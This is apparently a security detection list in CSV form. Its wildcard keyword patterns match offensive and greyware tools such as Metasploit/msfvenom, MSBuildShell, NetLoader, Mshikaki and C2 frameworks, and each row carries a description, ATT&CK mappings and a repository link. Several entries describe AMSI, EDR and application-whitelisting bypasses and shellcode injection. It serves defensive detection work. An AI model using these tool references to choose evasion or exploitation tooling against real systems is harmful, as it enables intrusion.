-*MS17-010*,offensive_tool_keyword,POC,MS17-010 poc github repos,T1204.002,TA0002,N/A,N/A,Exploitation tools,https://github.com/worawit/MS17-010,1,0,N/A,N/A,10,2048,1127,2023-06-20T08:27:19Z,2017-06-19T16:47:31Z
-*ms17-010_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*MSBuild.exe NetLoader.xml*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z
-*MSBuildShell*,offensive_tool_keyword,MSBuildShell,a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). 
which provides enhanced malware protection for Powershell scripts,T1027 - T1086 - T1059 - T1064 - T1089,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/MSBuildShell,1,1,N/A,N/A,3,274,81,2019-08-02T06:46:52Z,2016-11-11T18:52:38Z
-*MScholtes/PS2EXE*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z
-*msedge* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A
-*msedge* --headless --disable-gpu --remote-debugging-port=*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html,1,1,N/A,5,10,N/A,N/A,N/A,N/A
-"*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A
-*msf_api_doc.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*msf_cve_extracter.py*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z
-*msf_exec.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*msf_matchers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*msf_payload.ps1*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z
-*msf-auxiliarys*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z
-*msfconsole *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*msfconsole*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*msfconsole.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfconsole_spec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfcrawler.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfd.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb --component*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb --use-defaults*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb_helpers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfencode*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfJavaToolkit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-json-rpc.*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msf-json-rpc.ru*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msflag.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MsfModule*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msfmodule.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MsfModuleAsFunction*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msfpattern.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfpayload*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfpc.sh*,offensive_tool_keyword,msfpc,A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework),T1027 - T1036 - T1564 - T1071 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/g0tmi1k/msfpc,1,0,N/A,N/A,10,1127,274,2021-05-09T13:16:07Z,2015-06-22T12:58:04Z -*msfrelay.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-revhttps*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*MSFRottenPotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MSFRottenPotato.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-sgn.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*msfupdate_spec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfvemonpayload*,offensive_tool_keyword,cobaltstrike,backdoor c2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wahyuhadi/beacon-c2-go,1,1,N/A,10,10,36,8,2020-01-14T11:15:42Z,2019-12-22T08:59:34Z -*msfvenom 
*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*msfvenom -*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfvenom -*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*--msfvenom *,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*Mshikaki.exe*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*Mshikaki-main*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. 
